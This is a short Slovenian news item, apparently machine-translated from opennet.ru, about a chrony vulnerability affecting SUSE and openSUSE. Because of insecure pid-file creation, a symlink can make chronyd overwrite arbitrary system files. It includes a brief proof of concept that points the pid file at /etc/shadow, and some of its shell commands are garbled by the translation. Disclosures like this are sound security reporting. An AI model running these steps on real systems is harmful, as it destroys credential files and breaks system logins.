В
Ranljivost je posledica nevarnega ustvarjanja datoteke pid, ki je bila ustvarjena v fazi, ko chrony še ni ponastavil privilegijev in se je izvajal kot root. V tem primeru je bil imenik /run/chrony, v katerega je zapisana datoteka pid, ustvarjen s pravicami 0750 prek datotek systemd-tmp ali ko je bil chronyd zagnan v povezavi z uporabnikom in skupino »chrony«. Torej, če imate dostop do uporabniškega chrony, je mogoče datoteko pid /run/chrony/chronyd.pid zamenjati s simbolično povezavo. Simbolična povezava lahko kaže na katero koli sistemsko datoteko, ki bo ob zagonu chronyd prepisana.
root# systemctl zaustavi chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ izhod
root# /usr/sbin/chronyd -n
^C
# namesto vsebine /etc/shadow bo shranjen ID procesa chronyd
root# cat /etc/shadow
15287
Ranljivost
Problem SUSE in openSUSE
Vir: opennet.ru